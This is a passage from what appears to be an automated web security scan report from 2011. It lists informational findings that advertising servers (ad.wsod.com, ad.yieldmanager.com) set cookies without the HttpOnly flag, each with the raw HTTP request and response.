Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L; expires=Fri, 07-Oct-2011 12:48:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1142

   function wsod_image1542() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wj
...[SNIP]...

10.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/474.207.tk.TEXT/1315313093322187  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/474.207.tk.TEXT/1315313093322187

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/474.207.tk.TEXT/1315313093322187 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:44:58 GMT
Content-Type: image/gif
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:474:207:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; expires=Fri, 07-Oct-2011 12:44:58 GMT; path=/
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 42

GIF89a.............!.......,...........L.;

10.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/675.22.tk.120x301315313093322187  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/675.22.tk.120x301315313093322187

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/675.22.tk.120x301315313093322187 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:44:58 GMT
Content-Type: image/gif
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; expires=Fri, 07-Oct-2011 12:44:58 GMT; path=/
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 42

GIF89a.............!.......,...........L.;

10.21. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?XKUDANuUGABxQIsAAAAAAB4aEgAAAAAAAAAAAAIAAAAAAA0AAwADCOQEHgAAAAAA7mUJAAAAAAA.8RgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0AAAAAAAAAUQMh2vp8aLwdAAAAAAAAAFEDIdr6fGi8HQAAAAAAAABRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgCC9HQfquCkAOlZMpL9Io9i3zLSbCa8ZfwmnlAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15rca20kb%2FM%3D787833.14445125.14291892.1806201%2FD%3Dsports%2FS%3D2022092242%3ALREC%2F_ylt%3DAuXImj6wykRaku7iPAhaBYTSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3DzV2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261244%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445125%26Z%3D300x250%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D59509023%26cb%3D1315313081109312%26i%3D140509%26r%3D0,0254ac84-d886-11e0-b5f4-78e7d1fa057c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS&ad_type=iframe&ad_size=300x250&site=140509&section_code=14445125&cb=1315313081109312&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15rca20kb/M=787833.14445125.14291892.1806201/D=sports/S=2022092242:LREC/_ylt=AuXImj6wykRaku7iPAhaBYTSrYZ4/Y=YAHOO/EXP=1315320281/L=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS/B=zV2xPtj8elw-/J=1315313081109312/K=dHuXEgTLQ4cGOnShgI49sw/A=6261244/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'"; vuday1=4M6Eq!79C835n]5; liday1=*YKlx!79C85[p%3; bh="b!!!#E!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0406.rm.sp2
Set-Cookie: ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8^!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: vuday1=BgvR)!79C8gzv0u; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8^~~"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: uid=uid=04358f32-d886-11e0-934b-87a5113d12ef&_hmacv=1&_salt=1445808906&_keyid=k1&_hmac=71f80210cf05029c6f70f1dbcbfe9d80aca9ddb3; path=/; expires=Thu, 06-Oct-2011 12:44:52 GMT
Set-Cookie: liday1=8SkUp!79C8Jh]Hw; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:44:52 GMT
Pragma: no-cache
Content-Length: 1432
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9126001);}
</script><iframe name="tu
...[SNIP]...

10.22. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?M0EnBfsYGQDMqpkAAAAAAH7vJQAAAAAAAgAAAAIAAAAAAP8AAAADCF2yCAAAAAAAF7MxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByawMAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAMDEXZPBPwAAAAAAAAAAAADAxF2T0T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADyM7pcvfauCpvklJWDGZaJ844CyDZSBbQYVKfLAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15sa69po3%2FM%3D787833.14486084.14323910.12559432%2FD%3Dallmyfr%2FS%3D360632246%3ALREC%2FY%3DYAHOO%2FEXP%3D1315319387%2FL%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%2FB%3DejW9Ptj8el8-%2FJ%3D1315312187399365%2FK%3Dnql_VTEk0rLg6_ewKQ00GQ%2FA%3D6284639%2FR%3D0%2F%2A%24,http%3A%2F%2Ffrontier.my.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14486084%26Z%3D300x250%26_PVID%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%26_salt%3D1505089003%26cb%3D1315312187399365%26i%3D224114%26r%3D0,e974813c-d883-11e0-9781-78e7d15f7c8c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=rUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7&ad_type=iframe&ad_size=300x250&site=224114&section_code=14486084&cb=1315312187399365&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15sa69po3/M=787833.14486084.14323910.12559432/D=allmyfr/S=360632246:LREC/Y=YAHOO/EXP=1315319387/L=rUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7/B=ejW9Ptj8el8-/J=1315312187399365/K=nql_VTEk0rLg6_ewKQ00GQ/A=6284639/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!(!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE"; bh="b!!!#C!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:49 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0013.rm.sp2
Set-Cookie: ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!$=3f.'"; path=/; expires=Thu, 05-Sep-2013 12:29:49 GMT
Set-Cookie: vuday1=4M6Eq4M6Eq!79C88CF`W; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=*YKly!79C86nkxc; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:29:49 GMT
Pragma: no-cache
Content-Length: 996
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10070732);}
</script><IFRAME SRC="ht
...[SNIP]...

10.23. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS&ad_type=iframe&ad_size=728x90&site=140509&section_code=14445127&cb=1315313081109312&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15j13o5q5/M=787833.14445127.14291894.22/D=sports/S=2022092242:N/_ylt=Aq9E8pK_YqzvgGRT6l1fMpDSrYZ4/Y=YAHOO/EXP=1315320281/L=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS/B=0F2xPtj8elw-/J=1315313081109312/K=dHuXEgTLQ4cGOnShgI49sw/A=6261245/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'"; vuday1=4M6Eq!79C835n]5; liday1=*YKlx!79C85[p%3; 